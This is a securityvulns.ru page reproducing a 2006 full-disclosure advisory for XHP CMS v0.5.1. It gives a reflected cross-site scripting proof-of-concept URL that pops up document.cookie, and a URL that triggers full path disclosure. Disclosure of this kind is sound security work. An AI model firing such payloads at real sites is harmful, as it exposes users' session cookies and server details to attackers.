Computer Security

Security Advisory: XHP CMS v0.5.1 Vuls Xss and Full path vuls
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  уязвимости во многих популярных движках из за некоректной работы файловых функций языка PHP

  [Full-disclosure] PHProg : Local File Inclusion + XSS + Full path disclosure

  [Full-disclosure] KorviBlog - XSS permanent !

  Multible injections and vulnerabilities in Jetbox CMS

From:HACKERS PAL <security_(at)_soqor.net>
Date:11.09.2006
Subject:XHP CMS v0.5.1 Vuls Xss and Full path vuls

Hello,,


XHP CMS v0.5.1 Vuls

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


Xss
index.php?errcode=<script>alert(document.cookie);</script>

Full path
action.php?action=1&module=engine
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server